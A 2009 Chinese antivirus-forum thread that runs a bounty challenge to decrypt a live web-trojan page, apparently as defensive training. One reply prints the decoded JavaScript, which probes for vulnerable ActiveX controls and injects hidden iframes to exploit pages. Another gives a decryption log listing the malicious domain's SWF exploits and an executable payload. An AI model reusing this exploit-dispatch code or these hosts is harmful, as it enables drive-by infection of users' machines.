瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 网马解密悬赏第四十期(已结束)
networkedition - 2009-12-1 14:48:00


引用:
http://hzdj57.cn/wang/index.html




引用:
规则:1.一次解完并附解密日志和步骤(包含swf和pdf网马),奖赏10威望,如果部分解出,每步奖赏2威望;
            2.对于积极参与此活动会员,并多次中奖者,我们可以诚邀加入卡卡反病毒小组

 

引用:
解密工具:
  Freshow(中文版)
  Redoce(中文版)
  Malzilla (汉化版)

     
 

引用:
在线解析站点:
        http://glacierlk.cn/openlab/jm.htm
        [url=http://www.cha88.cn/
http://www.cha88.cn/[/quote[/url]]
   

引用:
注:论坛所有会员均可参加,严禁使用md的自动解密功能


   

引用:
恶意网址来源瑞星全功能安全软件拦截到真实有效的地址


用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)
networkedition - 2009-12-1 14:50:00
网页源代码见附件

附件: index.rar
jun0717 - 2009-12-1 17:53:00
encode解密
Cool_wXd - 2009-12-2 13:32:00
window.onerror=function(){return true;}

window.defaultStatus=".";
try{if(new ActiveXObject("snpvw.Snap"+"s"+"h"+"ot Viewer Control.1"))document.write('<iframe width=100 height=0 src=DKff.htm></iframe>')}catch(a){}try{var e;var ado=document.createElement("object");if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)ado.setAttribute("classid","clsid:B"+"D96C556-65A3-11D0-983A-00C04FC29E36");var as=ado.createobject("Adodb.Stream","")}catch(e){};finally{if(e!="[object Error]"){document.write('<iframe width=100 height=0 src=DK14.htm></iframe>')}else{try{var h;var glworld=new ActiveXObject("GLIEDown.IEDown.1")}catch(h){};finally{if(h!="[object Error]"){document.write('<iframe style=display:none src="DKgg.htm"></iframe>')}}try{var bf;var bfworld=new ActiveXObject("MPS.StormPlayer")}catch(bf){};finally{if(bf!="[object Error]"){document.write('<iframe style=display:none src="DKbf.htm"></iframe>')}}}}
function test()
{
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="\x36\x2e\x30\x2e\x31\x34\x2e\x35\x35\x32"){var ammc="dsvb";
document.write('<Iframe style=display:none src="DK122122.htm"></iframe>');}
else
document.write('<iframe style=display:none src="DK122121.htm"></iframe>');
}
test();
networkedition - 2009-12-2 16:11:00
这个地址没有失效呀,解完沙,解密日志贴上来
天涯浪子1988 - 2009-12-2 16:11:00
关于:hxxp://hzdj57.cn/wang/index.html解密的日志(全体输出 -  27):

Level  0>http://hzdj57.cn/wang/index.html
Level  1>http://hzdj57.cn/wang/DKcx.htm
Level  2>http://hzdj57.cn/wang/cx.js
Level  1>http://hzdj57.cn/wang/DKfl.htm
Level  2>http://hzdj57.cn/wang/DK11.html
Level  3>http://hzdj57.cn/wang/DD28.swf
Level  4>http://hzdj57.cn/hy.exe 
Level  3>http://hzdj57.cn/wang/DD64.swf
Level  3>http://hzdj57.cn/wang/DD45.swf
Level  3>http://hzdj57.cn/wang/DD115.swf
Level  3>http://hzdj57.cn/wang/swfobject.js
Level  2>http://hzdj57.cn/wang/DK22.html
Level  3>http://hzdj57.cn/wang/KK47.swf
Level  3>http://hzdj57.cn/wang/KK64.swf
Level  3>http://hzdj57.cn/wang/KK45.swf
Level  3>http://hzdj57.cn/wang/KK16.swf
Level  3>http://hzdj57.cn/wang/KK115.swf
Level  1>http://hzdj57.cn/wang/DKxxz.htm
Level  2>http://hzdj57.cn/hy.exe ●
Level  1>http://hzdj57.cn/wang/DK122121.htm
Level  1>http://hzdj57.cn/wang/DK122122.htm
Level  1>http://hzdj57.cn/wang/DKbf.htm
Level  2>http://hzdj57.cn/wang/baozi.js
Level  3>http://hzdj57.cn/hy.exe ●
Level  1>http://hzdj57.cn/wang/DKgg.htm
Level  1>http://hzdj57.cn/wang/DK14.htm
Level  1>http://hzdj57.cn/wang/DKff.htm

日志由 Redoce2.0第79次修正版于 2009/12/2 16:09:42 生成。
1
查看完整版本: 网马解密悬赏第四十期(已结束)